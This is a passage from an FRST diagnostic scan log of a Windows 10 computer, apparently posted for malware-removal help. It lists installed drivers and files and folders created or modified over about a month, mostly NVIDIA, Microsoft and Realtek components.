R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2016-08-30] (Logitech Inc.)
R3 LGSHidFilt; C:\WINDOWS\system32\DRIVERS\LGSHidFilt.Sys [64280 2016-08-30] (Logitech Inc.)
R1 MpKsl35e5afba; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{68A47D32-4851-413D-B35D-CF273C98F251}\MpKsl35e5afba.sys [44928 2017-09-01] (Microsoft Corporation)
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvdmi.inf_amd64_1a197825c61edb6c\nvlddmkm.sys [15668664 2017-07-20] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-27] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-27] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [120960 2011-07-26] (QUALCOMM Incorporated) [File not signed]
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-05-27] (Realsil Semiconductor Corporation)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [42856 2016-03-27] (Nefarius Software Solutions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-19] ()
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [66136 2017-02-16] (Synaptics Incorporated)
S3 taphss6; C:\WINDOWS\System32\drivers\taphss6.sys [42064 2016-11-23] (Anchorfree Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-19] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-19] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-19] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 19:48 - 2017-09-01 19:50 - 000028316 _____ C:\Users\Aezia Aznan\Downloads\FRST.txt
2017-09-01 19:46 - 2017-09-01 19:48 - 000000000 ____D C:\FRST
2017-09-01 19:16 - 2017-09-01 19:45 - 002395648 _____ (Farbar) C:\Users\Aezia Aznan\Downloads\FRST64.exe
2017-09-01 18:40 - 2017-09-01 18:40 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-31 23:04 - 2017-08-31 23:04 - 000000000 ___HD C:\$Windows.~WS
2017-08-31 22:58 - 2017-08-31 23:00 - 000000000 ____D C:\ESD
2017-08-31 12:36 - 2017-09-01 18:43 - 099352576 _____ C:\WINDOWS\system32\config\SOFTWARE
2017-08-31 12:34 - 2017-08-31 12:34 - 000000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-08-31 09:12 - 2017-08-31 09:12 - 000000000 ____D C:\Windows.old
2017-08-31 09:11 - 2017-08-31 09:11 - 000008192 _____ C:\WINDOWS\system32\config\userdiff
2017-08-31 09:11 - 2017-08-30 18:18 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\Windows Identity Foundation
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\Reference Assemblies
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\MSBuild
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files (x86)\MSBuild
2017-08-31 09:06 - 2017-02-11 02:26 - 001166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:26 - 000124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:26 - 000035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-08-31 09:06 - 2017-02-11 02:21 - 000778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:21 - 000103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:21 - 000035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-08-30 22:29 - 2017-08-30 22:29 - 000000000 ___HD C:\$SysReset
2017-08-30 22:16 - 2017-09-01 18:42 - 000418928 _____ C:\WINDOWS\ntbtlog.txt
2017-08-30 19:36 - 2017-08-30 19:36 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\DBG
2017-08-30 19:03 - 2017-08-30 19:03 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2017-08-30 19:00 - 2017-08-30 19:00 - 000000020 ___SH C:\Users\Aezia Aznan\ntuser.ini
2017-08-30 18:53 - 2017-08-31 23:04 - 000022055 _____ C:\WINDOWS\diagwrn.xml
2017-08-30 18:53 - 2017-08-31 23:04 - 000011433 _____ C:\WINDOWS\diagerr.xml
2017-08-30 18:49 - 2017-09-01 18:43 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-30 18:49 - 2017-09-01 18:25 - 000004160 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F7CF07EF-EA64-4CCB-AB8D-F401208271D2}
2017-08-30 18:49 - 2017-08-30 19:07 - 000003358 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3909864297-3729878400-1751894149-1001
2017-08-30 18:49 - 2017-08-30 18:49 - 000003458 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-30 18:49 - 2017-08-30 18:49 - 000003398 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000003234 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-30 18:49 - 2017-08-30 18:49 - 000003176 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002984 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002968 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002956 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002838 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002802 _____ C:\WINDOWS\System32\Tasks\ScpUpdater
2017-08-30 18:49 - 2017-08-30 18:49 - 000002786 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002744 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002420 _____ C:\WINDOWS\System32\Tasks\{F5F8BCC3-5972-4525-8741-F6E51B56A640}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002320 _____ C:\WINDOWS\System32\Tasks\{72CA1D33-A59E-4B21-80C6-621E26795DA2}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002304 _____ C:\WINDOWS\System32\Tasks\Shutdown
2017-08-30 18:49 - 2017-08-30 18:49 - 000002304 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-08-30 18:49 - 2017-08-30 18:49 - 000002250 _____ C:\WINDOWS\System32\Tasks\Baidu LiveUpdate
2017-08-30 18:49 - 2017-08-30 18:49 - 000002220 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2017-08-30 18:49 - 2017-08-30 18:49 - 000002172 _____ C:\WINDOWS\System32\Tasks\UninstMiniWifi
2017-08-30 18:49 - 2017-08-30 18:49 - 000000000 ____D C:\WINDOWS\System32\Tasks\OfficeSoftwareProtectionPlatform
2017-08-30 18:46 - 2017-08-31 20:48 - 000926438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-30 18:38 - 2017-08-30 18:38 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-08-30 18:30 - 2017-08-30 18:30 - 000000000 ____D C:\ProgramData\USOShared
2017-08-30 18:29 - 2017-08-30 18:40 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-08-30 18:26 - 2017-09-01 18:42 - 000000000 ____D C:\Users\Aezia Aznan
2017-08-30 18:24 - 2017-08-30 18:24 - 001019725 _____ C:\WINDOWS\system32\Drivers\rtwavesskdy.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000455938 _____ C:\WINDOWS\system32\Drivers\rtwavesmapro.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000031095 _____ C:\WINDOWS\system32\Drivers\rtwavesEFX.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000019678 _____ C:\WINDOWS\system32\Drivers\rtwavesmaprocap.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000010945 _____ C:\WINDOWS\system32\Drivers\rtwavesMFX.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H C:\ProgramData\DP45977C.lfl
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____D C:\WINDOWS\system32\SRSLabs
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____D C:\Program Files\Synaptics
2017-08-30 18:23 - 2017-09-01 18:57 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-08-30 18:23 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files\Intel
2017-08-30 18:23 - 2017-08-30 18:23 - 000000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 ____D C:\Program Files\Realtek
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin
2017-08-30 18:23 - 2016-11-07 16:56 - 000099864 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-08-30 18:22 - 2017-09-01 18:59 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-30 18:22 - 2017-08-30 18:30 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-08-30 18:22 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-08-30 18:22 - 2017-07-19 06:24 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-08-30 18:22 - 2017-07-19 05:54 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-08-30 18:22 - 2017-07-13 08:37 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-08-30 18:22 - 2017-03-19 03:56 - 002233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-08-30 18:21 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-08-30 18:18 - 2017-09-01 19:44 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-30 18:18 - 2017-08-30 21:39 - 000648288 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-30 17:25 - 2017-08-31 23:04 - 000000000 ___DC C:\WINDOWS\Panther
2017-08-30 17:25 - 2017-08-30 17:40 - 000000000 ___HD C:\$WINDOWS.~BT
2017-08-30 06:57 - 2017-08-30 17:24 - 000000036 _____ C:\WINDOWS\progress.ini
2017-08-30 05:54 - 2017-08-31 22:25 - 000000731 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Update Assistant.lnk
2017-08-30 05:54 - 2017-08-31 22:25 - 000000719 _____ C:\Users\Aezia Aznan\Desktop\Windows 10 Update Assistant.lnk
2017-08-20 05:31 - 2017-08-30 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2017-08-20 05:31 - 2017-08-20 05:31 - 000002115 _____ C:\Users\Public\Desktop\Google Slides.lnk
2017-08-20 05:31 - 2017-08-20 05:31 - 000002113 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2017-08-20 05:31 - 2017-08-20 05:31 - 000002103 _____ C:\Users\Public\Desktop\Google Docs.lnk
2017-08-11 19:49 - 2017-08-11 19:49 - 000000743 _____ C:\Users\Public\Desktop\The Walking Dead - A New Frontier.lnk
2017-08-11 19:38 - 2017-08-11 20:42 - 000000000 ____D C:\Users\Aezia Aznan\Downloads\TWDS3
2017-08-11 05:23 - 2017-08-11 05:23 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-08-11 05:23 - 2017-07-19 05:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-08-11 05:23 - 2017-03-11 04:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-08-11 05:23 - 2017-03-11 04:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-08-11 05:23 - 2017-03-11 04:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-08-11 05:23 - 2017-03-11 04:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-08-11 05:19 - 2017-07-19 07:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-08-11 05:19 - 2017-07-19 07:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-08-11 05:19 - 2017-07-19 07:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-08-11 05:19 - 2017-07-19 07:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-08-10 21:46 - 2017-08-10 21:46 - 000000000 ___SD C:\WINDOWS\UpdateAssistantV2
2017-08-10 21:40 - 2017-08-11 06:02 - 000016388 _____ C:\Users\Aezia Aznan\Documents\English Club.xlsx
2017-08-10 19:25 - 2017-08-10 19:25 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\UNP
2017-08-10 19:19 - 2017-08-10 19:19 - 000001414 _____ C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update and Privacy Settings.lnk
2017-08-06 16:58 - 2017-07-27 00:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-08-06 15:26 - 2017-03-28 12:37 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2017-08-06 15:26 - 2017-03-04 13:26 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-08-06 15:26 - 2017-03-04 13:18 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2017-08-06 14:41 - 2017-08-30 18:40 - 000000000 ____D C:\WINDOWS\system32\UNP
2017-08-06 14:41 - 2017-08-06 14:42 - 000000000 ____D C:\Program Files\UNP
2017-08-06 14:41 - 2017-02-16 02:07 - 000066136 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\SynRMIHID.sys
2017-08-06 14:06 - 2017-08-30 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-08-06 14:06 - 2017-08-06 17:01 - 000001489 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-08-06 14:06 - 2017-07-27 00:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-08-06 14:05 - 2017-07-26 20:40 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-08-06 01:38 - 2017-08-06 01:48 - 000000000 ____D C:\Program Files\rempl
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 18:43 - 2017-03-18 18:40 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-09-01 18:36 - 2016-09-22 14:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\DMCache
2017-09-01 17:40 - 2016-09-22 17:00 - 000000000 ____D C:\Program Files (x86)\Steam
2017-09-01 10:56 - 2017-03-19 04:01 - 000000000 ____D C:\WINDOWS\INF
2017-09-01 10:12 - 2016-09-21 23:08 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\Packages
2017-09-01 08:41 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\appcompat
2017-08-31 22:25 - 2016-09-28 17:27 - 000000000 ____D C:\Windows10Upgrade
2017-08-31 22:23 - 2016-09-22 14:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\IDM
2017-08-31 20:44 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-31 20:29 - 2016-09-21 23:49 - 000018960 _____ (Logitech, Inc.) C:\WINDOWS\system32\Drivers\LNonPnP.sys
2017-08-31 09:17 - 2017-03-19 04:03 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-08-31 09:12 - 2017-03-19 04:06 - 000000000 ____D C:\WINDOWS\Setup
2017-08-31 09:07 - 2017-03-19 03:56 - 000389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-08-31 09:07 - 2017-03-19 03:56 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-08-31 09:07 - 2017-03-19 03:56 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\telnet.exe
2017-08-31 09:06 - 2017-03-19 03:56 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-08-31 09:06 - 2017-03-19 03:56 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-08-31 06:01 - 2017-07-05 20:02 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\uTorrent
2017-08-31 06:01 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-31 05:55 - 2017-03-19 04:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-31 05:39 - 2017-03-19 03:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-30 21:25 - 2016-09-21 23:32 - 000000000 ____D C:\WINDOWS\SysWOW64\sda
2017-08-30 20:38 - 2017-05-25 17:05 - 000000000 ____D C:\MSI
2017-08-30 19:43 - 2016-09-22 00:22 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\CrashDumps
2017-08-30 19:07 - 2016-09-21 23:11 - 000002420 _____ C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-08-30 19:07 - 2016-09-21 23:11 - 000000000 ___RD C:\Users\Aezia Aznan\OneDrive
2017-08-30 19:00 - 2017-03-19 04:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-30 19:00 - 2016-10-03 10:31 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\ConnectedDevicesPlatform
2017-08-30 19:00 - 2016-02-13 20:22 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-30 18:59 - 2016-09-28 17:27 - 000000000 ___HD C:\$GetCurrent
2017-08-30 18:58 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-30 18:56 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-08-30 18:56 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Registration
2017-08-30 18:56 - 2017-03-18 18:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-30 18:52 - 2016-07-16 18:47 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-08-30 18:49 - 2017-03-19 09:31 - 000000000 ____D C:\WINDOWS\HoloShell
2017-08-30 18:49 - 2016-10-03 10:23 - 000022840 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-08-30 18:48 - 2017-03-19 04:03 - 000000000 __RHD C:\Users\Public\Libraries
2017-08-30 18:46 - 2016-11-21 18:01 - 000002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-30 18:46 - 2016-09-21 23:32 - 000898608 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-08-30 18:40 - 2017-07-28 20:04 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NEKOPARA Vol.3
2017-08-30 18:40 - 2017-07-28 17:03 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SVP 4
2017-08-30 18:40 - 2017-07-22 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
